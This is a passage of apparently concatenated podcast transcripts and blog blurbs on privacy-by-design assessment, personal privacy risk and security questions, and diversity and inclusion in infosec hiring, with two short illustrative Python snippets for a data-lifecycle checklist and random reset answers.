So, even if we are contacted later on, or after a privacy disaster, there's still a lot that we can do. But of course, in the future, what we would like is for no agency or actor to get into developing anything without having some safeguards in place. If you're developing new chemical materials, you would never think of selling something before it has gone through the appropriate safeguards. If you're developing a new drug, you would not dream of putting it on the market and selling it before you've proved that you've followed the precautionary principle and gone through the relevant agencies to have your initiative validated. How come in engineering, that is not the case? How come all these things are making it to the market with no way for society or the regulator to see what the social or legal impact of those new devices, initiatives, or data processes would be? That is what we're trying to solve.
So, even if we're contacted later on, there's still a lot that we can do. But also, we hope that over time, we'll convince our clients that they need to come to us right at the beginning of developing their new ideas.
Gemma Galdon-Clavell: Sure. I mean, these are the four steps that we think are necessary, not only to assess the risks of your product, but also to accompany the process of developing it. So, this runs from the very conception of the project or initiative until the very end, in the implementation. And the first step is to consider the desirability: does society need this? We think that in technology, there are a lot of people that come up with new technologies and then look for problems for their new technology to solve. And that should not be the case. You should develop technology because you have a problem that you wanna solve. That is the productive, innovative way of doing things.
There's something you wanna solve, like the quality of life of older people, or the quality of life of people with disabilities, or addressing discrimination in a sector or industry. So, you have a problem, and then you look for a solution that maybe technology can provide. That's the train of thought you wanna follow, but in technology, that's not always followed. So, we wanna make sure that that is the case.
But we also wanna make sure that you go beyond having a great idea. I always say that having a great idea is just the beginning. It's only the starting point. You need to plan all the way through implementation. We see so many technologies that are great ideas, but once they're out there, no one plans for, for instance, training the people that are gonna be using that technology, if you're offering that technology to third parties. If you don't take that into account, the people that are mediating your relationship with the client have no idea what they're doing. And so, of course, the way that the client is gonna see that technology is not gonna be as good as if the person in the middle knew what they were talking about and the possibilities of that technology. So, you need to plan for implementation and not just have the great idea.
So, ideally, in desirability, you would go through all these, making sure you have a thorough plan that actually solves the problem. So, that's the first pillar.
The second pillar is social acceptability. I think we've all learned with design thinking and service design that clients and stakeholders and people are just really important. You don't wanna develop technologies that then no one really uses. I mean, think Google Glass. You have this great idea in the lab, but then actually no one thinks that it's useful. You wanna avoid spending all that money on a pilot that, in the end, no one's gonna use. And you do that by talking to people. And there are methodologies and ways of making sure that you understand your potential client and you're building trust in your system. You may even go as far as having mechanisms for them to intervene even after the technology is on the market, so you see what their feedback is. So, it's some techniques from marketing, but adapted to this understanding of the social impact of technology.
Then we also wanna look at legal compliance, of course. You need to comply with the law, and here, there are so many industries that have suffered for not doing this. Think about the drone industry, for instance. A few years ago, everyone thought that drones were gonna be the next big thing, that you were gonna have your home deliveries come to you by drone, and companies invested a lot of money in this new technology because everyone was gonna be using drones. That didn't happen, because we didn't have a legal framework. If you had come to us five years ago, we could have told you the most likely thing is that drones get used in some rural areas and for crisis management, but they're not gonna be an everyday thing in the next 10 years. And then you would have saved a lot of money, and you could have invested in another technology that was more promising. So, complying with the law is really, really important.
But there are also things that are not part of the law that inform our laws, like social cohesion or trust. So, we also look at how those things are impacted by your technology. What is the impact of your technology or your data process on social cohesion and trust between actors? There are no laws about trust, but it's such an important part of how our society works, and it's important to put a specific emphasis on that. So, that is the legal pillar of our assessment.
And then finally, data management. I always say that data management is the source of all problems, but also the source of all solutions. So, what we do here is map the data lifecycle. For any piece of data that gets into your system, we look at its vulnerabilities and its moments of vulnerability. There are five moments of vulnerability for every piece of data that gets into your system: the moment of collection, the moment of storage, the moment of sharing, the moment of analysis, and the moment of deletion. In those five moments, things can go wrong. And so, based on what we've learned in the other pillars, we build specific mitigation measures into your system to make sure that you have encryption mechanisms in place, that you anonymize if that is needed, that you minimize the data that you use in your system, and that you have relevant contracts with the processors to protect your liability in case there's a data breach. So, in the end, we'll make your system more robust by following these four main pillars of emphasis.
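To make the data-management pillar a bit more concrete, here is a minimal sketch in Python of how a team might encode the five moments of vulnerability Gemma describes and check a data flow against the safeguards she mentions (minimization, encryption, anonymization, processor contracts). This is not Eticas' actual methodology; the stage names, mitigation labels, and function names are assumptions made purely for illustration.

from dataclasses import dataclass, field

# The five "moments of vulnerability" named in the interview.
LIFECYCLE_STAGES = ["collection", "storage", "sharing", "analysis", "deletion"]

# Hypothetical mapping of each stage to the safeguards mentioned above.
EXPECTED_MITIGATIONS = {
    "collection": {"data_minimization"},
    "storage": {"encryption_at_rest"},
    "sharing": {"processor_contract", "encryption_in_transit"},
    "analysis": {"anonymization_if_needed"},
    "deletion": {"retention_and_deletion_schedule"},
}

@dataclass
class DataFlow:
    name: str
    # Safeguards actually implemented at each stage of this particular flow.
    mitigations: dict = field(default_factory=dict)

def audit(flow: DataFlow) -> dict:
    """Return the safeguards still missing at each lifecycle stage."""
    gaps = {}
    for stage in LIFECYCLE_STAGES:
        implemented = set(flow.mitigations.get(stage, set()))
        missing = EXPECTED_MITIGATIONS[stage] - implemented
        if missing:
            gaps[stage] = sorted(missing)
    return gaps

if __name__ == "__main__":
    signup_flow = DataFlow(
        name="customer_signup",
        mitigations={"storage": {"encryption_at_rest"}},
    )
    print(audit(signup_flow))  # prints the stages with missing safeguards

Running the audit on a flow that only encrypts data at rest would print the safeguards still missing at every other stage, which is essentially the gap analysis the interview describes, expressed as a checklist.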
When we create new technologies, we want security and privacy, economic prosperity and sustainability, accountability but also confidentiality. The reality is that it is difficult to embed all of these values in one pass. As technologies get built, they also reveal which values we hold in higher regard than others.
To cope with moral overload, some have suggested that we start designing security and privacy controls as a gradient. Or perhaps certain controls get a toggle on/off switch.
We're also seeing this moral dilemma in AI: is the technology too volatile, or is proper data governance the answer?
For years, technologists wondered why the law can’t keep pace with technology. Instead of waiting for the government to pass a regulation, should we enlist private companies to regulate?
However, in a recent interview with privacy and cybersecurity attorney Camille Stewart, she said that laws are built in the same way a lot of technologies are built: in the form of a framework. That way, it leaves room and flexibility so that technology can continue to evolve.
While technologists and attorneys continue that debate, the US Federal Trade Commission is hard at work. They recently announced that if a company chooses to implement some or all of the GDPR across its entire operations and makes promises to U.S. consumers about its specific practices, it must live up to those commitments; otherwise, the FTC could initiate an enforcement action for failing to honor those EU data protection promises made to U.S. customers.
Panelists: Cindy Ng, Mike Buckbee, Forrest Temple, Kris Keyser
There are many advantages to being first, especially in the business world. Securing a first-place finish usually rewards the winner with monopoly-like status and the largest, most dominant market share. A byproduct of the winner-takes-all mentality, however, is sacrificing security. That's what Thomas Dullien of Google Project Zero suggested in his latest presentation on the relationship between complexity and the failure of security. He is onto something, because we're seeing strange incidents occur that we would never have imagined. A Melbourne man got shot because his image in Google's database was associated with criminals. A contractor's access passes were revoked because his direct manager didn't perform his entitlement reviews. What's going on?
In part two of my interview with Allison F. Avery, a Senior Diversity & Inclusion Specialist at NYU Langone Medical Center, she clarified common misconceptions about Diversity & Inclusion (D&I) and offered a framework and methodology to implement D&I. She reminded me, “You should not be doing diversity for diversity sake.”
Allison Avery: I'm going to challenge your question a little bit, because I think that people dichotomize those two things, as in: do you either want diversity, or do you want "quality"? And I think that those two things get pitted against each other as though they're mutually exclusive or in competition with each other, and that you have to choose. And I think that even looking at it that way puts people into a mind pretzel, and makes diversity seem antithetical to being a top-talent place and a top-talent institution. And I think it gives diversity a bad name, but it also feeds this kind of mythology that somehow diversity is lowering standards, or diversity is a compromise. And I think that whenever we get into this bind of doing things differently, our brains get into this idea that somehow, whenever we go against the grain, all of a sudden we're compromising our standards.
But all we're doing is changing our standards for something that we have prioritized for a different reason or rationale. We need to fully understand what that rationale is, and if we don't, that's when we tend to dichotomize, because we don't really understand the value of diversity and what the actual benefits of having a socially diverse workforce are. And the fact of the matter is it does lead to greater creativity, greater financial gains, greater innovation, and greater research. That has been substantiated in study after study, across different industries and in multiple different ways, from innovation and creativity to financial gains. It's been shown time and time again.
There is a big financial case for diversity, and it does literally make you smarter, more creative, and more conscious. Julie Peeler, who's the foundation director of the International Information Systems Security Certification Consortium, was citing in March how there are about 30,000 open positions in U.S. information security, and how the gap is growing wider and wider. And we've noticed this in medical school as well: it's easier at times to train people in technical skills than in human skills. And what we've noticed is that certain aspects of diversity, and what's needed for tech in the 21st century and for the next 50-plus years, are communication and analytical skills and participative decision making. Women in leadership positions tend to be more engaged in being able to do that.
They tend to be more collaborative. We've also noticed in medical school that it's easier to teach somebody some of the hard "skills" and harder to teach somebody some of the soft skills. It's harder to teach somebody the needs of a diverse community, but it's easier to teach them some of the hard skills that they're going to need. So if they have somewhat of an orientation, if they have potential, if they have capacity, if they have the ability to learn, those are things that you can test for if you look at psychometric testing or actual organizational development testing.
You can utilize or leverage that within your hiring system. So you look at a person's aptitude for learning, as opposed to being hard and fast about skill acquisition. The potential for a person to learn or acquire a new skill, you can test for that through psychometric testing. You get somebody who's good at organizational development, or organizational psych, you build that into your hiring process with your hiring managers, and you can test for it, and that might increase aspects of your diverse workforce, as opposed to being hard and fast about "you need to know this skill today." Instead it's "we can teach you this skill, but you're coming in with some of these other desired skills," and you're being more competency-based.
So we've noticed that when we switched to a more competency-based approach...so this person has the ability to deal with ambiguity, this person has better communication skills, this person has the capacity for critical thinking. When we switch to what kind of culture do we want, what type of learner do we want, what capacities and competencies do we want, then that changes the methodology and changes our hard and fast orientation of "you need to know this, this, this, this and this skill." It's like, we can teach you this skill, but we need you to have these levels of competency, because that's the culture we're trying to build. That's the community that we're trying to cultivate, and that's the innovation that we're trying to have within our organization to get to where we want to be.
A person who is not able to engage in lifelong learning and lifelong professional skill development generally is not the kind of person that you want in your organization anyway. So I think when you juxtapose diversity and skill, that's not even the right model or methodology for any industry, really.
For the 21st century, the Center for Talent Innovation does say that companies with diversity in management are 45% more likely to report growing market share, and they're 70% likelier to report that their companies captured a new market.
Cindy Ng: Can you give us some context to this stat? In the infosec space, 58% of females who hold leadership positions have advanced degrees versus the 47% of males.
Allison Avery: This is something that we see in a lot of different industries. And I wish I had a better name for it, but what tends to happen is that there's a luxury to convention. I would think of it this way: when a person looks the part, you assume a lot of things about them. You assume their competence, you assume their quality, you're not surprised. And so there's a luxury to their averageness, and there's a luxury to them being good enough, correct?
I think that, generally, when you do not look the part, you have to fill things in a little bit more, because people don't just assume that you're qualified in the same way. And so it's not as luxurious to just be good enough. You have to be above average in order to be considered equal. There's an adage, especially in the black community, that you need to be twice as good to be considered just as qualified. You're starting from a different assumption and a different framework, and then going from there.
A lot of times with women, people don't assume a level of competence; you have to prove it and then go from there. Whereas with the man who looks the part, who is assumed to be the part, you're assuming a level of competence and jumping off from that point. The level of work, the level of accomplishments, and the level of performance he needs don't have to be quite the same, because you're already assuming competence. And I think this actually harkens back to the initial question of, do you choose diversity or skills? And that goes back to so many questions when people say things, you know, when they look around the room. We've seen this on TV.
We hear this about, you know, certain social campaigns, about like, "Oh, did you get into Harvard because you were black, or because you deserved it?" Those two things...they're assumed to be diametrically opposed as opposed to thinking that the person...as opposed to assuming competence, and assuming quality and qualification.
Cindy Ng: How can we build a good D&I program? Or maybe a better question is what do we need to have on our radar so we can have the best possible outcome?
Allison Avery: The biggest, hairiest fault lines that I think happen to organizations are that they try to go too fast too soon when it comes to D&I, or they try to go from 0 to 1,000. I think that that's very dangerous; it can be very detrimental to D&I efforts. And so I think you want to be really, really clear on why you're doing it, because it's not just doing diversity for diversity's sake. That's a really important piece, because if you can't explain the rationale for why you're doing diversity, it ends up in that dichotomous form of, well, we're doing it because we have to, because it's a good thing. And so I am choosing diversity over skill set, and it stays in that kind of lazy mentality, where you only do a first pass.
And that, I think, is actually much more harmful than having nothing. If people don't understand why you're doing it, that's even worse than not doing it at all, in my opinion. And so really having a firm understanding of the actual benefits and the actual rationale is very, very helpful, and starting very, very small and clear. And then having it on multiple different registers, like I was saying. It's not just enough to have recruitment. This is where people get tripped up: they think, "Okay, well, we need more minorities, so what are we going to do? We're going to go recruit."
Well, if you bring people in, that's only one iota of what is happening, because that's just about diversity; that's not inclusion. Inclusion is about, okay, if you are recruiting a diverse workforce, then you have to look at engagement, you have to look at climate, you have to look at talent management, you have to look at succession planning, you have to look at the composition along the echelons of your institution, you have to look at compensation, you have to look at who's in upper management, who's in middle management, who's below management. You have to look at all of these different arenas.
And so I think you need a very comprehensive, multi-year strategic plan, with different goals and objectives, held accountable by a board that is not just staffed by, nor comprised solely of, underrepresented minorities, period. That is the most dangerous thing, too. It cannot just be minorities invested for themselves and of themselves. So if you're going to have any type of board or any kind of committee, it has to be led by an executive or the CEO. It has to be invested in by upper management and upper leadership. It has to be really, really supported, because otherwise it won't be successful. And you pair people across different ethnic domains, you have different relationship forms, like mentoring programs and talent management programs, pairing people from outside of their area of expertise, their social identity categories, even their gender identity categories.
You know, so that there is more relationship building, going back to this point of white Americans having 91 times as many white friends as black friends, to try to break down those types of prohibitive barriers, which can be compensated for if an intentional structural design is put in place within the institution or the organization.
Cindy Ng: Okay, we need to get everyone's buy-in, we need to build partnerships, and there needs to be a multi-year, long-term vision. It sounds so complicated.
Allison Avery: It's very complicated. And it's not just for one segment of the population; that's the transformative and sort of transcendent piece. That's the whole idea: if you understand it appropriately and you really know the actual benefits of social diversity within your industry, why it makes sense to have more social diversity within your organization, i.e., better financial gains, better product development, niche markets that can be developed, more engagement of your workforce, greater capacity, enhanced creativity, better innovation.
I mean, if you really, truly know that and then you see that, it betters everyone's game and everyone's performance in the organization. Albeit it makes things a little more challenging, because the more diverse and the more challenging things are, the harder people have to work. But it should pay dividends, that's the piece. It should make your company more lucrative, and then the people who work there should benefit from that. So it should make your lives better, our lives better. There really should be marketable as well as tangible payoffs that aren't this sort of esoteric, made-up, social-justice-circumscribed idea that it's good to do diversity for diversity's sake. It's not as ambiguous or opaque as people sort of feel it is.
We continue our conversation with cyber and tech attorney Camille Stewart on discerning one's appetite for risk. In other words, how much information are you willing to share online in exchange for something free?
It's a loaded question and Camille takes us through the lines of questioning one would take when taking a fun quiz or survey online. As always, there are no easy answers or shortcuts to achieving the state of privacy savvy nirvana.
What's also risky is mapping laws made for the physical world directly onto cyberspace. Camille warns: if we start making comparisons just because, at face value, the connection appears similar when in reality it isn't, we may set ourselves up to truly stifle innovation.
And if anybody remembers Henrietta Lacks, her data was used to create all of these things that are very wonderful, but she never got any compensation for it. Not knowing how your information is used takes away all of your control, right? In a world where your data is commoditized and has a value, you should be in control of the value of your data. And whether it's as simple as giving away our right to choose how and when we disburse our information, or our privacy leading to security implications, those things are important.
For example, you don't care that there's information pooled and aggregated about you from a number of different places, because you've posted it freely or because you traded it for a service that's very convenient, until the moment when you realize that because you took the quiz and let this information out, or because you didn't care that your address was posted on a Spokeo-like site or something else, the answers to all of your banking security questions are now easily searched on the internet and probably being aggregated by some random organization. So somebody could easily say, "Oh, what's your mother's maiden name? Okay. And what city do you live in? Okay. And what high school did you go to? Okay."
And those are three pieces of information that maybe you didn't post in the same place but you posted and didn't care because you traded it for something or you posted it and you didn't think it through and now they can aggregate it because you use those two things for everything and now someone has access to your bank account, they've got access to your email, they've got access to all of these things that are really important to you and your privacy has now translated into your security.
So just like organizations have to assess and decide on their appetite for risk, we as individuals have to do the same. And so if you are willing to take the risk because you think either, "They won't look for me," or, "I'm willing to take the hit because my bank will reimburse me," or whatever decision you are making, I want you to be informed.
I'm not telling you what your risk calculus is, but I wanna encourage people to understand how information can be used, understand what they're putting out there, and make decisions accordingly. So your answer to that might be, "Look, I don't wanna give up Facebook for this, or sharing information in a community that I trust on some social site, but what I will do is have a set of answers that I don't share with anyone for those normal questions they use for password resets, answers that are wrong, but only I know the fake answers I'm using for them."
So instead of your actual mother's maiden name, you're using something else and you've decided that that's one of the ways that you will protect yourself because you really wanna still use these other tools and that might be the way you protect yourself. So I challenge people not to give up the things that they love, like I mean, I would assess whether or not certain things are worth the risk, right?
Like a quiz on Facebook that makes you provide data to an external third party, when you're not really sure how they're using it, is not likely worth it. But the quizzes you can just kinda take, those might be worth it. I mean, the answers you provide for those questions are still revealing about you, but maybe not in a way that's super impactful. Maybe in a way that's likely just for marketing, and if you're okay with that, then take it, or you go the other way.
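As a small illustration of the "fake answers" habit Camille describes, here is a minimal sketch in Python that generates a random, unguessable answer to use for each password-reset question, to be stored in a password manager rather than remembered. The function name and the question labels are purely illustrative assumptions, not anything Camille prescribes.

import secrets
import string

def fake_answer(length: int = 16) -> str:
    # Random lowercase letters and digits, unrelated to your real history.
    alphabet = string.ascii_lowercase + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))

if __name__ == "__main__":
    # Hypothetical reset questions a site might ask.
    for question in ["mother_maiden_name", "first_school", "city_of_birth"]:
        print(question, fake_answer())

The point is the same one made above: the real answers to these questions are often discoverable or aggregable online, so answers that are wrong, random, and unique per site keep a quiz or a data broker from unlocking your accounts.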
Versus if there is human input, we would decide that that is something they can then own the production of, right, because they contributed to the making of whatever the end product is. It's hard to speculate, but there will have to be a line drawn, and it's likely somewhere in there, right? The sense that there is enough human intervention, whether that is input into whatever creative process is happening by the machine, or in the creation of the process or program or software that is being used and then spits out some creation at the end. There will have to be a law, or I guess at least case law, that dictates where that line is drawn.
But those will be the fun things, right? For Tiffany, and other lawyers like myself, I think those are the things that we enjoy most about this space: that stuff is unclear. And as these things roll out, you get to make connections between the monkey case and AI and other things that have already happened, and new processes, new tech, new innovations, and try to help draw those lines.
And so it's dangerous to make those comparisons without some level of assessment. And so I would tell people to challenge those assessments when you hear them and try to poke holes in them, because bad facts make for bad law. And if we take the easy route and just start making comparisons because on their face they seem similar, we may set ourselves up to truly stifle innovation, which is exactly what we're trying to prevent.
That is not the same in cyberspace. And to liken the two in the way that you apply rules is not smart, right? Your first inclination is to wanna try to stop data flow at the edge of a country, at the edge of some imaginary border, but it is not realistic, because the internet by its very nature is global and interconnected and, you know, traverses the world freely, and you can't really stop things at that line. Which is why things like GDPR are important for organizations across the world: as a company that has a global reach because you're on the internet, you will be affected by how laws are created in different localities.
So that's a very big example, but it happens in more discreet ways too when it comes to technology, cyberspace, and physical laws, or the physical space and the laws that operate there. And so I would challenge people, when you hear someone make a one-for-one connection very easily, without some level of assessment, to question it and make sure it really is the best way to adapt something to the given situation.
Take, for example, Tiffany's likening of AI to this monkey case. It's an easy connection to make, because in your head you think, "Well, the monkey is not human, they made a thing, and if they can't own the thing, then when you do that online and a machine makes a thing, it can't own the thing." But it very well may not be the same analysis that needs to be made in that setting, right? The lines may be drawn very differently, because none of us could create a monkey. So if I can't create a monkey, then it's harder to control the output of that monkey. But I could very well create a machine that could then create an output, and shouldn't I be the owner of that output if I created the machine that then created the output?
Data breaches keep on happening, and information security professionals are in demand more than ever. Did you know that there is currently a shortage of one million infosec pros worldwide? The solution to this "man-power" shortage may be right in front of and around us. Many believe we can find more qualified workers by investing in Diversity & Inclusion programs.
According to Angela Knox, Engineering Director at Cloudmark, "We're missing out on 50% of the population if we don't let them [women] know about the job."
For skeptics: creating a more diverse workplace isn't about window dressing. It makes your company more profitable, notes Ed Lazowska, a Professor of Computer Science and Engineering at the University of Washington-Seattle. "Engineering (particularly of software) is a hugely creative endeavor. Greater diversity — more points of view — yields a better result."
According to research from the Center for Talent Innovation, companies with a diverse management and workforce are 45 percent more likely to report growing market share, and 70 percent likelier to report that their companies captured a new market.
I wanted to learn more about the benefits of a D&I program, and especially how to create a successful one. So I called Allison F. Avery, Senior Organizational Development & Diversity Excellence Specialist at NYU Langone Medical Center, to get the details from a pro.
She is responsible for providing organizational development consultation regarding issues such as diversity and inclusion, performance improvement, workforce engagement, leadership development, and conflict resolution.
In part one of our interview, Ms. Avery sets the foundation for us by describing what a successful diversity & inclusion program looks like, explaining unconscious bias and her thoughts on hiring based on one's social network.
Cindy Ng: Can you define for us what diversity and inclusion mean?
Allison Avery: The way that I like to define, or the way that I'm going to talk about, diversity is really referring to the richness of human differences. And so, that can mean anything from socio-economic status, race, ethnicity, language, nationality, sexual orientation, and religion, all the way to learning styles and life experiences. I know, for the context of this conversation, we're really going to focus specifically on race, ethnicity, and gender, because that's really who's primarily underrepresented in the tech field. We're going to talk a lot about that, but diversity in and of itself primarily just means difference, and it's sort of a naturally-occurring phenomenon.
And then, inclusion is the way in which we engage that diversity. So, it refers to active, intentional and ongoing engagement with that diversity. It's the way that we foster belonging, that we value and encourage engagement and that we really connect individuals throughout. Whether it's an organization or institution, to leverage their excellence, leverage their skills, leverage their skill sets and promote them to grow into the climate and the culture that we're trying to cultivate within an organization, within an institution and even within an industry. So, it's the way that we intentionally, and ongoingly and actively engage the diversity at hand.
Cindy Ng: Describe for us the kinds of diversity and inclusion programs you've implemented and what has been successful.
Allison Avery: There are a couple of different arenas that I think diversity and inclusion programming gets parsed into. One is primarily along the lines of recruitment and retention. Now, in medical school, we tend to not have any general issue with retention, but that tends to be in the domain of professional development. And that's pervasive throughout any industry, and I see that within a lot of the articles I was reading in the tech industry. There are some initiatives going on through Google and Twitter of trying to recruit individuals from different industries to companies, and that's just a pervasive element. So, we do a lot of recruiting here at the medical school for students from the educational pipeline. So, we go to undergraduate institutions, we have summer programs for students that are rising juniors and seniors to come and spend the summer to do basic science research, primarily targeted for Blacks and Latinos because those targeted minority groups are underrepresented in medicine. Only about 6% of medical school matriculants are Black-identified and about 4% are Hispanic-identified in the country. About 56% are white-identified matriculants in medical school in 2014.
So, there's a huge underrepresentation and, as we see the shifting demographics of the country over time, minorities will become the majority by 2050. That's the projected year, or even before. So, we see a need for greater representation in the medical school, so we make a lot of recruitment efforts. NYU just matriculated its most diverse class ever; the entering class of 2014 was the most diverse we've had, and so our efforts were quite rewarded in having cultivated a class of compositional diversity. That was a very successful effort, and it comes from everything from going to schools to having a very diverse group of individuals on the screening committee and on the interview committee. We have multiple mini interviews, where individuals do not review the full record. When students come in for interviews, we try to eliminate aspects of bias. So, there are trainings on unconscious bias for all the interviewers and trainings on unconscious bias for all the screeners. That's another effort that we make. So, recruitment is a really big, targeted effort with regard to any industry for trying to attract and recruit underrepresented minorities.
Another area is educational enrichment. And so, there's a lot of effort to look at how we ameliorate and reduce health and healthcare disparities. That's basically looking at cultural competency training for all physicians, because rendering appropriate healthcare, and rendering it across different cultural lines, is something that every physician needs to have the capacity for, especially when we're looking at the diversity and the pluralistic community of the patient population that all physicians need to have the capacity to serve. And so, I think that that's also generalizable to the tech industry when you look at the shifting demographics of the country's users. So, there is a huge pluralistic nation that we have, and people have different needs, and there are very different markets that can be targeted and marketed toward. Having different educational initiatives, looking at how we reduce health and healthcare disparities, and training students has been a very big initiative within the curriculum.
So, how do we basically educate our entire population of students to be able to render care for a huge and diverse patient population? They need to know about things like health disparities, they need to know about things like social determinants of health. They need to know about how bias might impact their decision-making on treating different types of patients of certain races, of certain genders, of certain sexual orientations. And they need to know how, generally, socially disadvantaged groups tend to receive worse quality healthcare.
Cindy Ng: Earlier you mentioned unconscious bias. Can you define that term for us?
Allison Avery: Unconscious is pretty much anything that's outside of our conscious awareness, which is primarily the main way that we operate; it's estimated that about 90% of our mental processes and the way that we operate is outside of consciousness. So, the unconscious is pretty much any mental process that is inaccessible to consciousness but influences our judgments, our feelings, and our behavior. It's pretty pervasive.
And then, bias is really a neutral term. It gets a kind of negative rap, but it's something that we cannot do without, nor would we want to. Bias is just a tendency or an inclination, but it's one that prevents an unprejudiced consideration of a question. So, it has this sort of stigma to it, but bias in itself is a neutral thing. The way that we understand unconscious bias, though, and the way that we're talking about it, is in this arena of prejudice: social stereotypes and attitudes that we form about certain groups of people without our intention or our conscious awareness. And that's what we really mean when we're talking specifically about unconscious bias as it relates to certain groups of people and how that influences the way that we engage with people.
That's how I'm using the term as it relates to D&I work in our workspace: how it might prevent the hiring of a person, and how it might impede diversity and inclusion efforts. It's been noted as one of the main contributing barriers to compositional diversity efforts. In hiring practices, in the recruitment phase, in the interview phase, in trying to really have a very diverse workplace, unconscious bias has been singled out as a huge impediment to having the diversity that we would consciously like to see. And I think it's really important to make the distinction between what we consciously believe, and we might have these very consciously-held egalitarian views, which I believe we do if you look at social attitudes in this country over the past 40 years and how drastically they've grown, changed, and evolved. It's more stigmatized now to be a racist in this country than probably almost anything else; it's very, very stigmatized. However, when you look at some of our unconscious attitudes and some of the outcomes, a lot of our actual practices, i.e., some of the health outcomes, some of our housing outcomes, some of the actual behaviors and outcomes, have remained unchanged.
So, like you were saying, in the tech industry there have been a lot of things that have remained unchanged for the past 15 years, or two years, or 10 years. It's that spectrum, or that dichotomy, between what we consciously believe and, sometimes, the way our unconscious behaviors manifest and get played out. Bridging those two is the space of bias work: trying to bring those two things a little bit more into alignment, a little bit closer together. So, we have these pretty egalitarian conscious attitudes, but the outcomes don't really reflect that when you look at some of our composition in the workspace, some of our health outcomes, and the way that we hope to think of ourselves. You know, look at the composition of our prison system; look at the composition of women in the tech field.
Cindy Ng: It's popular in the tech field to hire based on one's social network. What's your opinion on that?
Allison Avery: I think on face value and on first flush, that seems like a good idea but I don't think we've tracked the full ramifications of what that means. And I think that there's a way that, on first pass, that seems like a very respectable way to go about doing business, and I think on one level it is. But we need to do a little bit of a deeper dive on what do we mean by things like, how do we define culture fit? How do we define somebody who is aligned with our organization and the diversity that we want? And what are the actual ramifications of just pulling from our social networks? So, when we look at how people's social networks get created and cultivated, they tend to be, like you said, people tend to migrate toward people that are like them. And that tends to also fall within similar social identity categories, socio-economic lines and class status, correct?
So, on one level, it seems like a very good...on first pass, if you don't dig any deeper, it seems like a very good idea. Okay. Somebody suggests a friend and that person comes into the organization, and they probably do fit in very well, and they probably get along very well and then you kind of go forward without thinking much further. But then, when you look at the compositional diversity of who, then, you attract, everybody sort of seems to either come from similar schools so you're not getting a diversity of educational experiences, come from similar classes and, potentially, demographics. So, you might have similar social identity categories of composition. When you look at the composition...I was just reading this article called, "What it's actually like to be a black employee in a tech company," and they cited some really, really interesting statistics and I think it's very worthwhile to go over those because the Public Religion Research Institute has some statistics related to people's social networks. And you know, white Americans have 91 times as many white friends as black friends. I think that's really important because three-quarters of whites have entirely white social networks without any minority presence. So, if that's where you're pulling from, what are the odds that you're going to have a huge minority presence if that's the pool that you're pulling from? Clearly, just from a statistical representation, very, very small, correct?
But unless you know that, and unless you're thinking in those terms, it just seems like a very good idea on first pass. That's why a deeper dive is so much more necessary, and that's why I think that there isn't this intentional evilness to people who are anti-diversity. It's just that they don't tend to know, nor do they tend to dig, and there's this naiveté of, "Well, invite individuals from their social networks and things should just be fine." But people think that their social networks are much more diverse than they actually are, and that's just not true. And so, once you know that, "Okay, if this is our structure, employees are actively encouraged to suggest friends or former colleagues," well, if you also know that your company is comprised of 57% of this, and then you know that those individuals are going to be 91 times more likely to, "Blah, blah, blah," well, then you're going to rethink your methodology. But generally, people don't have that type of statistical awareness or insight into how these social networks are formed or structured, and so they don't understand all the nuance related to recruitment and why it's so difficult to achieve elements of compositional diversity.
Cindy Ng: How would you reshape hiring practices?
Allison Avery: So, a couple of different things. One, I would have pervasive unconscious bias training for all hiring managers completely required. I mean, that's just a given and an automatic.
Number two, there are some things right at the outset that take people out of the running right away, like affiliate universities. There's pooling from similar universities that have a lower representation of underrepresented minorities.
So, you make partnerships with schools that serve very high proportions of either women or underrepresented minorities, and those tend to actually not be the Berkeleys and the Stanfords of the world. So, you can look at the compositional diversity of different institutions. I know at NYU we tend to partner with certain very specific institutions that have very strong STEM programs, so they're doing a lot of work with very high-quality students and doing a lot of rigorous scientific work, and we make very strong partnerships with them so that we also know the quality and the caliber of the student. And so, you can be a hiring manager and make partnerships, whether with a nonprofit or with an undergraduate institution that serves a high proportion of minorities, but one that you also are vetting with regard to quality, or whose quality you're investing in. So, you can help mentor them in the creation or co-creation of their program and have some sort of influence. That's another way. So, you develop these kinds of pipeline programs, that's another one, and then you reward those elements.
Having internships, that's another element, not just pooling people from your social network. Also, the more diverse your hiring system is...so, we know that with whatever kind of interview process you have, if you put five people in a room and that's the interview team, they are going to replicate themselves in who they hire. So, whomever you want hired is how you compose your hiring team. If you would like a very diverse team hired, then you need to have a very diverse hiring team. The worst thing that you can do is have just one hiring manager, because you're most likely going to have that person replicated in whomever they hire. So, you want as many people to weigh in as possible, and you want the team that weighs in to be as diverse as possible. So, that's another recommendation that we make.
So, those would be just the first pass of things that I would recommend, very quickly. And taking out loaded words in the job description of what you're looking for. We know that there's a lot of gender priming in job descriptions, things like "strong leader" and "aggressive manager," and those are very, very gender-oriented. Or when people assume a lot of things about candidates at the very outset, like whether they're interested in relocating or not, or ask inappropriate questions that they wouldn't ask a man versus a woman, and things like that, really being conscientious that that is not present within any part of the onboarding. So, that's also looking at the job descriptions and really making sure that those aren't either gender- or racially-leaning.
And making sure that these things are advertised and reach individuals in different pockets, so utilizing and leveraging people in-house too. You know, in reading some of these articles, there are a lot of informal or even formal professional networks within an organization or institution. So, we have the Black and Latino Student Association, and they belong to a professional association called the Student National Medical Association, which is primarily for black medical students. Then there's the NHMA, the National Hispanic Medical Association, which serves Hispanic medical affiliates. And so, there are a lot of affiliate networks, formal and informal. I know there was one in one of the articles I was reading about Twitter, called Blackbird, Twitter's internal group for black employees. So it's about leveraging the internal group that serves, or represents the interests of, the underrepresented or underserved minorities that you're targeting. And being really intentional about saying that this is a priority, and this is why, and this is why we're valuing a certain demographic that's extraordinarily underrepresented in this organization.
Also, look at pay differentials, something that is very pervasive. Look at how people are staffed, look at upper-level management and its composition, and how the color changes as you go up the rungs. And we know that the American Institute for Economic Research has done a lot of work noting that employees of color are statistically paid less by a considerable margin. That's substantiated by a lot of economic research looking at how pay differs and trying to reconcile that, looking at how people are promoted and where they're staffed. Are the majority of black employees at the janitorial and security contractor level, or are they in middle management? How are people being staffed throughout the organization, and where, and what does that look like? You can be more intentional about that, and it's important.
While reading about our latest technological advances, such as digital license plates and self-driving cars, I wondered about our industry’s core security principles that set the foundation for all our innovation.
However, what about user agreements? We're able to create incredible new advances, yet we can't get our user agreements right. Even though the agreements are for the users, it's rare that they want to read the legalese. It's just easier to click 'accept'. As the author suggests, there must be a better way for end users to interact with tech companies.
Many want the law to keep pace with technology, but what's taking so long?
